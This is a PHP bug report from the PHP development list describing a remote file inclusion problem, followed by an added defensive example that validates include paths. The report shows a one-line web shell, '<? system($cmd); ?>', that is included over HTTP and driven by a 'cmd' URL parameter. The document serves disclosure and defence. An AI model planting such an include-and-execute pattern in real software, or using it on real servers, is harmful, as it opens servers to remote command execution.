From:             [EMAIL PROTECTED]
Operating system: Linux 2.4
PHP version:      4.1.1
PHP Bug Type:     Scripting Engine problem
Bug description:  PHP parses untrusted documents (or something like that ;P)

Hello,

I think there is a pretty large security issue in PHP. E.g. we have 2
servers, we call server 1 'embrace', and name server 2 'kossy'.

on embrace we create a file index.php:
<? include("http://kossy/issue.php"); ?>

on kossy we create a file issue.php:
<? system($cmd); ?>

Well, if we now type: http://embrace/index.php?cmd=ls we see the 'ls'
output from kossy. This is the way it should be. BUT, when we disable PHP
on kossy we get a rather nasty bug (imho).

If we type http://embrace/index.php?cmd=ls again (where kossy has no PHP
support) embrace includes the PHP source code from kossy and then parses
the file, which will give us the 'ls' result on embrace.

This can be used for numerous attacks. And I think PHP should only include
parsed PHP or non-PHP files from external (http://) links.

Bye,
Tozz

-- 
Edit bug report at: http://bugs.php.net/?id=15187&edit=1
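The report above shows why an include() whose path comes from request data (a URL, or a file name on a host that later stops executing PHP) ends up running whatever the remote side serves. The following is an added example, not code from the bug report or from PHP itself, of the defensive pattern: refuse any scheme-prefixed path and only include files that resolve inside one local directory. The `pages` directory and the `page` parameter are hypothetical names.

```php
<?php
// Added example (hypothetical names): a guarded include that never accepts
// "http://kossy/issue.php"-style paths and never leaves $baseDir.
// Pair this with php.ini settings allow_url_fopen=Off and, on PHP 5.2+,
// allow_url_include=Off so include() cannot open URLs at all.

// Return the canonical path of $name inside $baseDir, or null if it must not be included.
function resolve_local_include(string $baseDir, string $name): ?string
{
    // Reject anything carrying a scheme or stream wrapper (http://, ftp://, php://, data:, ...).
    if (preg_match('~^[a-z][a-z0-9+.-]*:~i', $name)) {
        return null;
    }
    // Reject empty names, absolute paths, NUL bytes and parent-directory traversal
    // before touching the filesystem (PHP 8 throws on NUL bytes in realpath()).
    if ($name === '' || $name[0] === '/' || strpos($name, "\0") !== false
        || preg_match('~(^|/)\.\.(/|$)~', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // realpath() resolves symlinks, so a final prefix check keeps the target inside $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Hypothetical usage: ?page=about.php is allowed, ?page=http://kossy/issue.php
// and ?page=../../etc/passwd are refused with a 400 instead of being included.
$page = resolve_local_include(__DIR__ . '/pages', $_GET['page'] ?? 'home.php');
if ($page === null) {
    http_response_code(400);
    exit('invalid page');
}
include $page;
```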


-- 
PHP Development Mailing List <http://www.php.net/>